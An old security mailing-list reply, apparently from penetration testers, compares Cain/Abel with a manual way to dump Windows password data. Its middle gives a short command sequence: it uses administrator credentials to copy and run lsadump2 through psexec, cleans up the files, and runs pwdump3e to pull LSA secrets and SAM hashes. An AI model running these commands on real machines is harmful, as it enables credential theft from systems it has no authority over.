Re: Cached NT/W2k passwords

[Kurt Grutzmacher <grutz () jingojango net>]

> You can get the password of the currently logged in user with Cain
> It's the most easiest method to dump all the passwords in the system,
> Including the passwords in the protected storage component of windows.

Correct, but not complete. Abel (the remote part of Cain) only pulls the 
SAM table (pwdump) and LSA secrets (lsadump). It also requires that Abel 
be installed and running which can be a boundary issue from a 
tester/client relationship. I like its additional features but, IMHO, 
it's a bit more cumbersome to install. I'm not a big fan of losing 
control over installation (point-and-click)

If you're trying to keep things off of a client's machine that could be 
used by a separate party (like Abel) then you're better off doing 
something like this:

net use z: \\server\c$ pw /u:administrator
copy lsadump2.exe c:\
copy dumplsa.dll c:\
psexec \\server c:\lsadump2
del z:\lsadump2.exe z:\dumplsa.dll
pwdump3e server

Yeah, you've got the admin password and it may have been insanely easy 
to get -- but you're not installing a listening package like Abel that 
could be controlled by an outsider. The only thing left on the remote 
machine is PSEXECSVC.EXE which can be done away with rather easily.

I think the original poster (and many others like us :-) want to find 
the cached Windows logon passwords. It used to be in lsass memory but an 
upcoming patch is going to "fix" it. It's got to be stored somewhere 
since XP/2003 must be backwards compatible.